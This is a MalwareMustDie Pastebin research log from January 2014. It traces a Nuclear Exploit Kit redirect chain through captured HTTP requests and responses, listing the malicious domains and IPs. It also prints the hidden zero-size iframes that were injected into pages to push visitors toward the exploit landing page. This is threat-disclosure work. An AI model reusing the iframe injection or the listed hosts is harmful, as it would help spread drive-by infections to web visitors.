MalwareMustDie

#Nuclear EK infection domain chains..

Jan 16th, 2014
778
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # MalwareMustDie | Nuclear Exploit infection domain chains..(in investigation)
  2. # *.hak.su / wen.ru (178.218.210.188)
  3. # vubetw.com/* (95.211.52.50)
  4. # sk6ev8d.fielderpercussionist.pw/* (192.95.10.211)
  5. # pic: http://box.jisko.net/i/965eec32.png
  6. # Thursday January 16 2014 -- 19:13:36 +02:00
  7. # credit: mak`
  8.  
  9. Lead:
  10. h00p://jp.hak.su
  11.  
  12. // forwarded to...
  13.  
  14. GET / HTTP/1.1
  15. Accept: text/html, application/xhtml+xml, */*
  16. Referer: h00p://www.google.com
  17. Accept-Language: en-US
  18. User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
  19. Accept-Encoding: gzip, deflate
  20. Host: jp.hak.su
  21. Connection: Keep-Alive
  22.  
  23. HTTP/1.1 200 OK
  24. Server: WEN.RU httpD 3.7
  25. Content-Type: text/html; charset=utf-8
  26. Date: Thu, 16 Jan 2014 16:06:48 GMT
  27. Last-Modified: Thu, 16 Jan 2014 12:36:22 GMT
  28. Accept-Ranges: bytes
  29. Connection: close
  30. Cache-Control: no-cache, max-age=0
  31. Pragma: no-cache
  32. Expires: Wed, 15 Jan 2014 16:06:48 GMT
  33. Content-Length: 291
  34.  
  35. <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta h00p-equiv="Content-Type" content="text/html; charset=utf-8">
  36. <title>jp.hak.su</title></head><body>
  37. <p align="center">
  38. </p></body></html> <iframe src="h00p://vubetw.com/jp.php" width="0" height="0"></iframe>
  39.  
  40. // forwarded to:
  41.  
  42. less jp.php
  43. <iframe width=10 height=10 src="h00p://sk6ev8d.fielderpercussionist.pw/69e33c-2dbS87-09_06Y6c7X2d0_19Wa8c-4682a4/70/38201690f2b69d4483bd4893d72c0ee8.html"></iframe>
  44.  
  45.  
  46. //Fetch
  47.  
  48. --2014-01-17 01:30:40-- h00p://sk6ev8d.fielderpercussionist.pw/69e33c-2dbS87-09_06Y6c7X2d0_19Wa8c-4682a4/70/38201690f2b69d4483bd4893d72c0ee8.html
  49. Resolving sk6ev8d.fielderpercussionist.pw (sk6ev8d.fielderpercussionist.pw)... 192.95.10.211
  50. Caching sk6ev8d.fielderpercussionist.pw => 192.95.10.211
  51. Connecting to sk6ev8d.fielderpercussionist.pw (sk6ev8d.fielderpercussionist.pw)|192.95.10.211|:80... connected.
  52.  
  53. GET /69e33c-2dbS87-09_06Y6c7X2d0_19Wa8c-4682a4/70/38201690f2b69d4483bd4893d72c0ee8.html h00p/1.1
  54. Referer: h00p://vubetw.com/jp.php
  55. Host: sk6ev8d.fielderpercussionist.pw
  56. HTTP request sent, awaiting response...
  57.  
  58. HTTP/1.1 200 OK
  59. Server: nginx/0.7.67
  60. Date: Thu, 16 Jan 2014 16:30:45 GMT
  61. Content-Type: text/html
  62. Connection: keep-alive
  63. X-Powered-By: PHP/5.3.27
  64. Vary: Accept-Encoding,User-Agent
  65. Content-Length: 3
  66.  
  67. 200 OK
  68. Length: 3 [text/html]
  69. Saving to: '38201690f2b69d4483bd4893d72c0ee8.html'
  70. 2014-01-17 01:30:41 (56.4 KB/s) - '38201690f2b69d4483bd4893d72c0ee8.html' saved
  71.  
  72. ---
  73. #MalwareMustDie!
RAW Paste Data